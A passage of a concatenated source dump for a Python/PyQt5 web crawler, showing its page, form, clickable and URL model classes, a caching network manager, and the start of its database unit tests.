            msg += " - ID: " + self.id
        if self.event is not None and not self.event == "":
            msg += " - Event: " + self.event
        if self.html_class is not None and not self.html_class == "":
            msg += " - Class: " + self.html_class
        msg += " - Domaddress: " + self.dom_address
        if self.links_to is not None:
            msg += " - Links to: " + self.links_to
        if self.clickable_depth is not None:
            msg += " - Clickable Depth: " + str(self.clickable_depth)
        if self.function_id is not None:
            msg += " - FunctionID: " + self.function_id
        if self.clickable_type is not None:
            if self.clickable_type == ClickableType.CreatesNewNavigatables:
                msg += " - ClickableType: CreateNewNavigatable"
            elif self.clickable_type == ClickableType.Link:
                msg += " - ClickableType: Link"
            elif self.clickable_type == ClickableType.SendingAjax:
                msg += " - ClickableType: SendingAjax"
            elif self.clickable_type == ClickableType.UIChange:
                msg += " - ClickableType: UiChange"
            elif self.clickable_type == ClickableType.Error:
                msg += " - ClickableType: Error"
            elif self.clickable_type == ClickableType.IgnoredByCrawler:
                msg += " - ClickableType: IgnoredByCrawler"
            elif self.clickable_type == ClickableType.UnsupportedEvent:
                msg += " - ClickableType: UnsupportedEvent"
            else:
                msg += " - ClickableType: Unknown"
        msg += "]"
        return msg

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        if self.clickable_type is not None and other.clickable_type is not None:
            return self.dom_address == other.dom_address and self.event == other.event and self.clickable_type == other.clickable_type and self.links_to == other.links_to
        else:
            return self.dom_address == other.dom_address and self.event == other.event and self.links_to == other.links_to

    def __hash__(self):
        s_to_hash = self.toString()
        return hash(s_to_hash)


    def __ne__(self, other):
        return not self.__eq__(other)

    def similar(self, other):
        """True if *other* is equal to self, or a near-duplicate (same class,
        id and event, and DOM addresses within a small edit distance)."""
        if not isinstance(other, self.__class__):
            return False
        if self == other:
            return True
        # Bug fix: the old code compared self.html_class against the whole
        # *other* object, and compared the bare `levenshtein` function
        # (which was not even imported here) with 4. Compare the attribute
        # and actually compute the edit distance of the DOM addresses.
        elif (self.html_class == other.html_class and self.id == other.id
              and self.event == other.event
              and levenshtein(self.dom_address, other.dom_address) < 4):
            return True
        else:
            return False
--------------------------------------------------------------------------------
/crawler/models/clickabletype.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from enum import Enum
19 |
class ClickableType(Enum):
    """Classification assigned to a clickable after triggering it
    (see Clickable.clickable_type)."""
    UIChange = 0                 # triggering only changed the UI
    Link = 1                     # behaved like a plain link
    CreatesNewNavigatables = 2   # produced new navigatable state
    Error = 3                    # triggering failed
    SendingAjax = 4              # fired an Ajax request
    IgnoredByCrawler = 5         # deliberately skipped by the crawler
    UnsupportedEvent = 6         # event kind the crawler cannot handle
    CreateNewWindow = 7          # opened a new window
--------------------------------------------------------------------------------
/crawler/models/deltapage.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
19 | from models.webpage import WebPage
20 |
class DeltaPage(WebPage):
    """A page state reached by triggering an event, i.e. a delta relative to
    its parent page."""

    def __init__(self, id, url=None, html=None, cookiesjar=None, depth=None, generator=None, parent_id=None, delta_depth=None, base_url=None):
        WebPage.__init__(self, id, url, html, cookiesjar, depth, base_url=base_url)
        self.generator = generator          # clickable that produced this page
        self.generator_requests = []        # async requests fired by the generator
        self.parent_id = parent_id          # id of the page this delta belongs to
        self.delta_depth = delta_depth

    def toString(self):
        """Human-readable dump of the delta page and everything found on it."""
        pieces = [
            f"[ Page: {self.url} - ID: {self.id} - Depth:{self.current_depth} \n",
            f"Parent-ID: {self.parent_id} - Generator: {self.generator.toString()} - Delta Depth: {self.delta_depth} \n",
        ]
        if self.generator_requests:
            pieces.append("Generator AsyncRequests: \n")
            pieces.extend(" - " + req.toString() + " \n" for req in self.generator_requests)
        if self.clickables:
            pieces.append("Clickable: \n")
            pieces.extend(item.toString() + " \n" for item in self.clickables)
        if self.timing_requests:
            pieces.append("Timingrequests: \n")
            pieces.extend(item.toString() + " \n" for item in self.timing_requests)
        if self.links:
            pieces.append("Static Links: \n")
            pieces.extend(link.toString() + " \n" for link in self.links)
        if self.forms:
            pieces.append("Forms: \n")
            pieces.extend(form.toString() + " \n" for form in self.forms)
        return "".join(pieces) + "]"
55 |
56 |
57 |
--------------------------------------------------------------------------------
/crawler/models/enumerations.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 | from enum import Enum
18 |
class XHRBehavior(Enum):
    """How XMLHttpRequests are treated during crawling."""
    IgnoreXHR = 0      # let XHRs pass unnoticed
    ObserveXHR = 1     # record XHRs
    InterceptXHR = 2   # intercept XHRs
23 |
--------------------------------------------------------------------------------
/crawler/models/form.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
19 | import hashlib
20 |
21 |
class HtmlForm():
    """Models an HTML form: its input fields, action url and HTTP method."""

    def __init__(self, parameters, action, method, dom_address=None):
        """
        :param parameters: array of FormInput's.
        :param action: Url object; its abstract_url feeds the form hash.
        :param method: HTTP method of the form.
        :param dom_address: optional address of the form in the DOM.
        """
        # Sort by field name so the form hash is stable regardless of order.
        self.parameter = sorted(parameters, key=lambda parameter: parameter.name if parameter.name is not None else "")
        self.action = action
        self.method = method
        self.dom_address = dom_address

    @property
    def form_hash(self):
        return self.get_hash()

    def toString(self):
        msg = "[Form: Action: '" + self.action.abstract_url + "' Method:' " + self.method + " - Formhash: " + self.get_hash() + " \n"
        if self.dom_address is not None:
            msg += "Dom Address: " + self.dom_address + " \n"
        for elem in self.parameter:
            msg += "[Param: " + str(elem.tag) + " Name: " + str(elem.name) + " Inputtype: " + str(
                elem.input_type) + " Values: " + str(elem.values) + "] \n"
        return msg + "]"

    def hasSubmit(self):
        # Bug fix: there is no self.submit attribute anywhere in this class,
        # so the old `self.submit != None` always raised AttributeError.
        # Report whether any field of the form is a submit input instead.
        return any(p.input_type == "submit" for p in self.parameter)

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.get_hash() == other.get_hash()

    def __ne__(self, other):
        return not self.__eq__(other)

    def get_hash(self):
        """MD5 over action url, method and each field's name/tag/type."""
        s_to_hash = self.action.abstract_url + ";" + self.method + ";"
        for p in self.parameter:
            s_to_hash += str(p.name) + ";" + p.tag + ";" + str(p.input_type) + ";"
        b_to_hash = s_to_hash.encode("utf-8")
        d = hashlib.md5()
        d.update(b_to_hash)
        return d.hexdigest()
62 |
63 |
class FormInput():
    """One input element of a form: tag, name, type and optional values."""

    def __init__(self, tag, name, input_type="", values=None):
        self.tag = tag
        self.name = name
        self.values = values
        self.input_type = input_type

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        # Every one of our values must also appear in the other's values.
        if self.values is not None:
            for needed in self.values:
                if other.values is None or needed not in other.values:
                    return False
        return (self.tag, self.name, self.input_type) == (other.tag, other.name, other.input_type)

    def __ne__(self, other):
        return not self.__eq__(other)

    def toString(self):
        return f"[Param: {self.tag} Name: {self.name} Inputtype: {self.input_type} Values: {self.values}] \n"
86 |
87 |
class InputField():
    """A concrete input field as rendered on a page."""

    def __init__(self, input_type, html_id=None, html_class=None, value=None):
        self.input_type = input_type
        self.html_id = html_id
        self.html_class = html_class
        self.value = value  # predefined value, if the page supplies one
94 |
--------------------------------------------------------------------------------
/crawler/models/keyclickable.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from models.clickable import Clickable
19 | from models.clickabletype import ClickableType
20 |
class KeyClickable(Clickable):
    """A clickable that is triggered by typing a character into the element."""

    def __init__(self, clickable, key_event):
        Clickable.__init__(self, clickable.event, clickable.tag, clickable.dom_address,
                           clickable.id, clickable.html_class, clickable.clickable_depth,
                           clickable.function_id)
        # The key typed in to trigger the clickable.
        self.random_char = key_event

    def toString(self):
        """One-line summary of this key-triggered clickable."""
        chunks = ["[TAG: " + self.tag]
        if self.id not in (None, ""):
            chunks.append(" - ID: " + self.id)
        if self.event not in (None, ""):
            chunks.append(" - Event: " + self.event)
        if self.html_class not in (None, ""):
            chunks.append(" - Class: " + self.html_class)
        chunks.append(" - Domadress: " + self.dom_address)
        if self.links_to is not None:
            chunks.append(" - Links to: " + self.links_to)
        if self.clickable_depth is not None:
            chunks.append(" - Clickable Depth: " + str(self.clickable_depth))
        if self.function_id is not None:
            chunks.append(" - FunctionID: " + self.function_id)
        if self.clickable_type is not None:
            labels = {
                ClickableType.CreatesNewNavigatables: "Create_new_navigatable",
                ClickableType.Link: "Link",
                ClickableType.SendingAjax: "SendingAjax",
                ClickableType.UIChange: "UiChange",
                ClickableType.Error: "Error",
            }
            label = labels.get(self.clickable_type)
            if label is not None:
                chunks.append(" - ClickableType: " + label)
        if self.random_char is not None:
            chunks.append(self.random_char)
        chunks.append("]")
        return "".join(chunks)
--------------------------------------------------------------------------------
/crawler/models/link.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
class Link():
    """A static <a href> link found on a page."""

    def __init__(self, url, dom_address, html_id="", html_class=""):
        self.url = url                  # Url object of the link target
        self.dom_address = dom_address  # address of the <a> element in the DOM
        self.html_id = html_id
        self.html_class = html_class

    def toString(self):
        text = f"[A-HREF: {self.url.abstract_url} - {self.url.url_hash}"
        text += f" - Domadress: {self.dom_address}"
        if self.html_id != "":
            text += f" - ID: {self.html_id}"
        if self.html_class != "":
            text += f" - Class: {self.html_class}"
        return text + "]"

    def __eq__(self, other):
        # Two links are the same when they point at the same url.
        return isinstance(other, self.__class__) and self.url == other.url

    def __ne__(self, other):
        return not self.__eq__(other)
44 |
--------------------------------------------------------------------------------
/crawler/models/parametertype.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from enum import Enum
19 |
20 | __author__ = 'constantin'
21 |
class ParameterType(Enum):
    """
    This describes the type of the parameters:
    - Digit: single digit, e.g. 0, 1, 2, ...
    - Float: float value, e.g. 1.5, 99.32, 3.1415, ...
    - Char: single digit, float or character, e.g. a, B, X, 5, ...
    - Integer: normal integer > 9, e.g. 23, 39, 42, ...
    - String: contains only characters, e.g. Turing, Captain Jack
    - AlphaNumerical: everything else, e.g. diofjiodjr23jre9324jr3j0ew9rj
    - NoParameter: no parameter is present at all
    """
    Digit = 0
    Float = 1
    Char = 2
    Integer = 3
    String = 4
    AlphaNumerical = 5
    NoParameter = 6
40 |
--------------------------------------------------------------------------------
/crawler/models/timingrequest.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
19 | from models.asyncrequests import AsyncRequests
20 |
21 |
class TimingRequest(AsyncRequests):
    '''
    Models an Ajax-Request issued after timeout or intervall
    '''

    def __init__(self, method, url, time, event, parameters=None):
        super(TimingRequest, self).__init__(method, url, parameters)
        # Timeout or Intervall trigger, plus the configured delay.
        self.event = event
        self.time = time

    def toString(self):
        return f"[Timing - Method: {self.method} - Url: {self.url.toString()} - Trigger: {self.event}]"
33 |
--------------------------------------------------------------------------------
/crawler/models/url.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import hashlib
19 | from urllib.parse import urlparse
20 |
21 |
class Url():
    """Parsed url with its query parameters collected into a key-sorted dict
    and an MD5 hash over path + parameter names."""

    def __init__(self, url, depth_of_finding=None):
        self.complete_url = url
        parsed_url = urlparse(url)
        self.scheme = parsed_url.scheme
        self.domain = parsed_url.netloc
        # A bare "/" path is normalized to the empty string.
        if parsed_url.path != "/":
            self.path = parsed_url.path
        else:
            self.path = ""
        self.query = parsed_url.query
        self.fragment = parsed_url.fragment

        self.parameters = {}                        # param name -> list of values
        self.depth_of_finding = depth_of_finding
        self.url_structure = None                   # set by later analysis
        self.abstract_url = None                    # set by later analysis

        if len(parsed_url.query) > 0:
            for splits in self.query.split("&"):
                tmp = splits.split("=")
                if len(tmp) == 2:
                    param_name, param_value = tmp
                else:
                    # "key" without "=value" (or a malformed pair): value unknown.
                    param_name, param_value = tmp[0], None
                self.parameters.setdefault(param_name, []).append(param_value)
            # Rebuild in sorted key order so iteration and hashing are stable.
            self.parameters = {key: self.parameters[key] for key in sorted(self.parameters)}

        self.url_hash = self.get_hash()

    def get_values_to_parameter(self, parameter_name):
        """Return the list of values seen for *parameter_name*; raise KeyError if absent."""
        if parameter_name not in self.parameters:
            raise KeyError("{} is not in parameters".format(parameter_name))
        return self.parameters[parameter_name]

    def get_url_description(self):
        return self.url_structure

    def get_path(self):
        """Return scheme://domain/path, or "" when there is no path."""
        result = self.scheme + "://" + self.domain
        if self.path is not None and len(self.path) > 0:
            if self.path[0] == "/":
                result = self.scheme + "://" + self.domain + self.path
            else:
                result = self.scheme + "://" + self.domain + "/" + self.path
            return result
        else:
            # NOTE(review): a url with an empty path yields "" here, not
            # scheme://domain - preserved as-is; confirm callers expect this.
            return ""

    def get_hash(self):
        """MD5 over the path plus the sorted parameter names (values ignored)."""
        s_to_hash = self.path
        for k in self.parameters:
            s_to_hash += "++" + k
        b_to_hash = s_to_hash.encode("utf-8")
        d = hashlib.md5()
        d.update(b_to_hash)
        return d.hexdigest()

    def toString(self):
        return self.complete_url

    def has_equal_description(self, other):
        # Bug fix: this read self.___class__ (three underscores), which
        # raised AttributeError on every call.
        if not isinstance(other, self.__class__):
            return False
        return self.url_hash == other.url_hash

    def equal_abstract_url(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.abstract_url == other.abstract_url

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.toString() == other.toString()

    def __ne__(self, other):
        return not self.__eq__(other)
--------------------------------------------------------------------------------
/crawler/models/urlstructure.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from enum import Enum
19 | import hashlib
20 | from models.parametertype import ParameterType
21 |
22 | __author__ = 'constantin'
23 |
24 |
class UrlStructure():
    """Abstract description of a url: its path plus typed parameters."""

    def __init__(self, path, paramters=None, url_hash=None):
        self.path = path
        # Bug fix: the default was a mutable dict literal shared by every
        # instance created without explicit parameters.
        # Dict of parametername -> {parameter_type, origin, generating};
        # "generating" means a change of the param creates a new page.
        self.parameters = paramters if paramters is not None else {}
        self.url_hash = url_hash

    def get_parameter_type(self, parameter_name):
        """Return the ParameterType of *parameter_name*; raise KeyError if absent."""
        if parameter_name not in self.parameters:
            raise KeyError("{} not found".format(parameter_name))
        return ParameterType(self.parameters[parameter_name]['parameter_type'])

    def get_parameter_origin(self, parameter_name):
        """Return the ParameterOrigin of *parameter_name*; raise KeyError if absent."""
        if parameter_name not in self.parameters:
            raise KeyError("{} not found".format(parameter_name))
        # Bug fix: origins were wrapped in ParameterType instead of
        # ParameterOrigin (copy-paste from get_parameter_type).
        return ParameterOrigin(self.parameters[parameter_name]['origin'])

    def toString(self):
        msg = "[Url: {} \n".format(self.path)
        for param in self.parameters:
            msg += "{} - {} - {} - {} \n".format(param, ParameterType(self.parameters[param]['parameter_type']), ParameterOrigin(self.parameters[param]['origin']), self.parameters[param]['generating'])
        msg += "Hash: {}]".format(self.url_hash)
        return msg


class ParameterOrigin(Enum):
    """Whether a parameter's value is produced on the server or in the client."""
    ServerGenerated = 0
    ClientGenerated = 1
52 |
53 |
--------------------------------------------------------------------------------
/crawler/models/utils.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from enum import Enum
19 |
20 |
def levenshtein(s1, s2):
    """Return the Levenshtein (edit) distance between *s1* and *s2*."""
    # Keep the shorter string as s2 so the row buffer stays small.
    if len(s1) < len(s2):
        s1, s2 = s2, s1
    if not s2:
        return len(s1)

    # Dynamic programming over one rolling row (len(s2) + 1 wide).
    prev_row = list(range(len(s2) + 1))
    for row_idx, ch1 in enumerate(s1, start=1):
        cur_row = [row_idx]
        for col_idx, ch2 in enumerate(s2, start=1):
            cost = 0 if ch1 == ch2 else 1
            cur_row.append(min(prev_row[col_idx] + 1,       # insertion
                               cur_row[col_idx - 1] + 1,    # deletion
                               prev_row[col_idx - 1] + cost))  # substitution
        prev_row = cur_row

    return prev_row[-1]
40 |
41 |
class CrawlSpeed(Enum):
    """How aggressively the crawler interacts with the page's JavaScript."""

    Slow = 0
    Medium = 1
    Fast = 2
    Speed_of_Lightning = 3
47 |
48 |
def purge_dublicates(X):
    """Return X without duplicates, keeping only the *last* occurrence of each value.

    Membership tests (not hashing) are used, so unhashable items such as
    lists are supported; the cost is O(n^2).
    """
    return [item for position, item in enumerate(X) if item not in X[position + 1:]]
--------------------------------------------------------------------------------
/crawler/models/webpage.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
class WebPage:
    """One crawled page: its DOM snapshot plus everything discovered on it
    (clickables, links, forms, AJAX and timing requests)."""

    def __init__(self, id, url = None, html = None, cookiesjar = None, depth = None, base_url = None):
        self.id = id
        self.cookiejar = cookiesjar
        self.url = url
        self.html = html
        self.clickables = []
        self.timing_requests = []
        self.links = []
        self.forms = []
        self.current_depth = depth
        self.ajax_requests = []
        # Bug fix: base_url was previously discarded (always set to None),
        # so pages containing a <base> tag lost that information.
        self.base_url = base_url

    def toString(self):
        """Return a multi-line, human-readable summary of the page."""
        try:
            url = self.url.toString()
        except AttributeError:
            # self.url may be a plain string instead of a Url object.
            url = self.url
        msg = "[ Page: " + url + " - ID: " + str(self.id) + " - Depth:" + str(self.current_depth) + " \n"
        if len(self.clickables) > 0:
            msg += "Clickable: \n"
            for elem in self.clickables:
                msg += elem.toString() + " \n"
        if len(self.timing_requests) > 0:
            msg += "Timingrequests: \n"
            for elem in self.timing_requests:
                msg += elem.toString() + " \n"
        if len(self.links) > 0:
            msg += "Static Links: \n"
            for link in self.links:
                msg += link.toString() + " \n"
        if len(self.forms) > 0:
            msg += "Forms: \n"
            for elem in self.forms:
                msg += elem.toString() + " \n"
        if len(self.ajax_requests) > 0:
            msg += "Ajax-AsyncRequests: \n"
            for elem in self.ajax_requests:
                msg += elem.toString() + " \n"
        return msg + "]"
61 |
--------------------------------------------------------------------------------
/crawler/network/__init__.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
--------------------------------------------------------------------------------
/crawler/network/network.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from PyQt5.Qt import QNetworkAccessManager, QDesktopServices, QNetworkDiskCache
19 | import logging
20 | from PyQt5.QtNetwork import QHttpMultiPart, QHttpPart
21 |
22 |
class NetWorkAccessManager(QNetworkAccessManager):
    """Qt network access manager with an on-disk cache and automatic cleanup
    of finished replies."""

    def __init__(self, parent, cache_size = 100, cache_dir='.webkit_cache'):
        super(NetWorkAccessManager, self).__init__(parent)
        self.finished.connect(self._finished)
        disk_cache = QNetworkDiskCache()
        disk_cache.setCacheDirectory(cache_dir)
        # cache_size is given in MiB; Qt expects a byte count.
        disk_cache.setMaximumCacheSize(cache_size * 1024 * 1024)
        self.setCache(disk_cache)

    def _finished(self, reply):
        # Schedule finished replies for deletion so they do not accumulate.
        reply.deleteLater()

    def createRequest(self, op, req, device=None):
        self.reply = None
        return QNetworkAccessManager.createRequest(self, op, req, device)

    def __del__(self):
        # Intentionally a no-op; Qt owns the underlying resources.
        pass
58 |
--------------------------------------------------------------------------------
/crawler/tests/__init__.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | __author__ = 'constantin'
19 |
--------------------------------------------------------------------------------
/crawler/tests/databasetest.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import logging
19 | from copy import deepcopy
20 | from database.database import Database
21 | from models.ajaxrequest import AjaxRequest
22 | from models.clickable import Clickable
23 | from models.clickabletype import ClickableType
24 | from models.form import HtmlForm, FormInput
25 | from models.url import Url
26 | from models.webpage import WebPage
27 |
28 | __author__ = 'constantin'
29 |
30 | import unittest
31 |
# Shared fixtures for the tests below. The mutable ones (CLICKABLE, WEBPAGE,
# AJAXREQUEST) are deepcopy-ed inside tests that mutate them.
SESSION = 12345  # arbitrary crawl-session identifier
WEBPAGE_ID = 99
TEST_URL1 = "http://example.com"
# NOTE(review): "exmaple" is misspelled - presumably deliberate test data.
TEST_URL2 = "http://example.com/exmaple.php"
TEST_HTML = ""
CLICKABLE = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3")
WEBPAGE = WebPage(1, url= TEST_URL1, html= TEST_HTML, cookiesjar= None, depth= 24, base_url= TEST_URL2)
AJAXREQUEST = AjaxRequest("GET", TEST_URL1, CLICKABLE, parameters=["test=Test"])
40 |
41 |
class DataBaseTests(unittest.TestCase):
    """Integration tests for Database CRUD operations on urls, clickables,
    web pages, forms and AJAX requests."""

    def setUp(self):
        # Fresh database namespace for every test.
        self.database = Database("DataBaseUnit")


    def test_url_set_and_get(self):
        """An inserted URL comes back unchanged from the crawl queue."""
        url = Url(TEST_URL1, depth_of_finding=3)
        self.database.insert_url_into_db(SESSION, url)
        url2 = self.database.get_next_url_for_crawling(SESSION)
        self.assertEqual(url, url2)
        self.assertEqual(url2.depth_of_finding, 3)

    def test_url_visit(self):
        """Visited URLs are not handed out again by the crawl queue."""
        url1 = Url(TEST_URL1, depth_of_finding=3)
        url2 = Url(TEST_URL2, depth_of_finding=25)

        self.database.insert_url_into_db(SESSION, url1)
        self.database.insert_url_into_db(SESSION, url2)

        url3 = self.database.get_next_url_for_crawling(SESSION)
        self.database.visit_url(SESSION, url3, 25, 200)
        url4 = self.database.get_next_url_for_crawling(SESSION)

        self.assertEqual(url1, url3)
        self.assertEqual(url2, url4)

    def test_url_set(self):
        """Inserting the same URL twice does not create a duplicate row."""
        url1 = Url(TEST_URL1, depth_of_finding=3)
        url2 = Url(TEST_URL2, depth_of_finding=25)

        self.database.insert_url_into_db(SESSION, url1)
        self.assertEqual(self.database.urls.count(), 1)
        self.database.insert_url_into_db(SESSION, url1)
        self.assertEqual(self.database.urls.count(), 1)
        self.database.insert_url_into_db(SESSION, url2)
        self.assertEqual(self.database.urls.count(), 2)


    def test_clickables(self):
        """Clickables round-trip through the database and can be marked clicked."""
